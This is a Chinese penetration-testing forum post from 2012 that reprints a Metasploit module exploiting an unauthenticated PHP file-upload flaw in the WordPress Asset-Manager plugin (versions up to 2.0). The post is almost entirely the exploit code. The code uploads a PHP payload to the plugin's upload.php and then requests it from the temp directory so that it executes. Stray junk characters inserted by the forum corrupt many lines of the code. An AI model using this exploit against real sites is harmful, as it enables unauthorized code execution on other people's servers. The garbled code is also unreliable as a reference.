找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2713|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。2 B( t8 z1 M: [3 F4 m* ^
9 w2 B' _3 h8 Y
##/ c; h7 B: a+ z! N& v* a
# This file is part of the Metasploit Framework and may be subject to% ]5 D- ~+ L7 n4 T0 z
# redistribution and commercial restrictions. Please see the Metasploit
8 n1 ]$ `8 [; g# Framework web site for more information on licensing and terms of use.( G8 Q# P2 V$ j. a& v
#   http://metasploit.com/framework/
- D* |$ n% t4 B- f' t+ {; E##1 B; y% M# s$ I) r0 J

/ _* A# c- U- T! \1 C% Zrequire 'msf/core'
- b, D9 S5 c" K4 n0 Srequire 'msf/core/exploit/php_exe'
' m" W1 @. g0 k3 B/ {4 E( ~ # T$ s1 X/ _5 Z: A6 s
class Metasploit3 < Msf::Exploit::Remote
3 H0 \: E8 E5 n! U# f2 F- Y  [% Y$ L) _  Rank = ExcellentRanking
. o) n% D$ `. q4 W 8 H+ M5 m8 x1 `8 q+ u5 n. [  n  Y
  include Msf::Exploit::Remote::HttpClient
. Z! q  v9 i% m8 D  include Msf::Exploit:hpEXE9 H" d. Q* \' j$ V

( R0 q& f0 U' y/ n  def initialize(info = {})9 o2 b3 j1 }  d& M4 u
    super(update_info(info,
4 r* A6 t8 S/ y( V# f- f7 f      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
7 p7 {1 ?# |+ B' ~& P# S7 C$ m1 m, j      'Description'    => %q{
& ~+ r7 u. B# a4 x" R' ]% J        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress4 N+ e" `3 z: V4 {8 V7 {3 `7 r4 d' r
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a" ?, H6 `% F1 T& _, A
        temp directory without authentication, which results in arbitrary code execution.6 p  X( _+ G" T3 s& t
      },
) n1 ~! _5 ~/ M' @& x& L. l& _      'Author'         =>; x5 S4 @; f% b# h0 q% d5 v! Q' a
        [. s( x5 k3 l9 F, A; E, Y
          'Sammy FORGIT', # initial discovery
- j1 x0 Z1 D* N. A! `- v% R. X          'James Fitts <fitts.james[at]gmail.com>' # metasploit module  B  K* C7 `( n0 U' M  B& C+ J
        ],) g4 O$ _% P- l3 B$ i& u+ q
      'License'        => MSF_LICENSE,2 {* K% S' G* S* E( a# N
      'References'     =>, h. F: U- a) q
        [$ s# H1 W4 r% r( C
          [ 'OSVDB', '82653' ],) }# W% z5 E6 Z7 u& S# R
          [ 'BID', '53809' ],! s; F( N- \/ |3 m7 f) e9 u) q
          [ 'EDB', '18993' ],) r, k& _+ C1 M$ w$ X1 s
          [ 'URL', 'http:// www.myhack58.com /' ]
5 [9 G9 v6 r4 |2 g' X        ],, g' j4 \: m9 W
      'Payload'       =>! s9 Z+ I8 O6 i; D1 }
        {
4 t8 ^' j  y& Z          'BadChars' => "\x00",* U9 V" C% }4 i( K* {  s9 I+ o" w) x
        },
* j. t  z9 T! i" [4 E. U3 T+ e      'Platform'       => 'php',5 G  p1 P0 w2 x
      'Arch'           => ARCH_PHP,
7 ?; w3 a- V+ p3 o      'Targets'        =>
/ p6 e5 K3 s( o        [
9 g+ p7 L' |! c' H/ z1 ]9 |          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 `% d: {& g7 d6 j+ O! o: ~5 e  d  _          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
/ j0 J) q0 i6 w4 ]        ],
: O* u* q* f: F( _( p! s) B7 i      'DefaultTarget' => 0,
! r4 b- ~/ o1 H2 A# J  J9 s" D      'DisclosureDate' => 'May 26 2012'))
. Z4 M1 I% t3 T7 U 7 \" `/ B* X7 i7 ^
    register_options(7 k! l) W" e1 ?3 P: B
      [
$ c  B8 \8 x3 X5 u: f0 g        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']): O5 V5 e- j& A  o$ y+ w! j2 W
      ], self.class)
; X' }+ u6 ~  Z  v  end8 U0 ~: r* c8 f8 u
6 `( A; K# B  _9 o* `0 ^1 e; \5 g
  def exploit
6 h* i$ @1 \& A) l5 J    uri =  target_uri.path
, r( \" C: W3 C/ y! L" ?; a  l* g; r    uri << '/' if uri[-1,1] != '/'8 Z) a4 x7 p3 C: L4 v
    peer = "#{rhost}:#{rport}"/ @9 k9 E+ y' ^% |6 t
    payload_name = "#{rand_text_alpha(5)}.php"$ n" ~; f6 i+ p! D0 ~6 @
    php_payload = get_write_exec_payload(:unlink_self=>true); f/ P. H; r, l0 t  S9 @

: t) ^3 {' d" g    data = Rex::MIME::Message.new
! ?, M* [$ n" `5 f5 u/ p/ c    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
) p8 \- Q& i% K5 d% F    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')) r3 |* a3 j% G3 `* _% _
6 M; K4 y* f8 A
    print_status("#{peer} - Uploading payload #{payload_name}")
0 K7 ^' J' ^$ l) l- y* B2 |5 ~    res = send_request_cgi({6 Z8 K0 V$ \+ D) l) M4 H
      'method'  => 'POST',% U# P  y- {# v5 \1 G9 E
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",; t; s8 x, m9 u. v7 V0 p4 z
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",: p+ E2 r5 O) \9 v
      'data'    => post_data! F7 Q0 o# S0 U1 P1 [6 `
    })1 [% C8 }7 Q* S7 ?5 A
# o6 o; |! H3 a4 k& @
    if not res or res.code != 200 or res.body !~ /#{payload_name}/! s6 s; T4 a+ n" V: l
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed"); l. n- [8 p( [* J& h
end
# J! V1 U- s! ?- a3 ~9 O: R- ^
9 O. H: k7 g5 m" s. T    print_status("#{peer} - Executing payload #{payload_name}")/ w& |3 J7 ]& s0 N. r3 U5 i5 X
    res = send_request_raw({. N2 H$ Q  x9 h3 l; ~
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
# |! h- H: O2 c! ]+ j9 x  x      'method'  => 'GET'
, H" T1 Q/ m5 ?$ I! R    })
) T9 _, \0 ]# B' ` 6 Z, |4 M, R. C* |! I2 {
    if res and res.code != 2005 O2 e3 `9 f+ g$ _5 Z
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed"), G6 C3 I) A2 u- w
    end$ T$ O' T. }8 H/ k2 C- h) t& d2 g
  end. z1 G2 _6 H% R& `& @! ^
end
  j: @' i, g" X5 }3 s
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表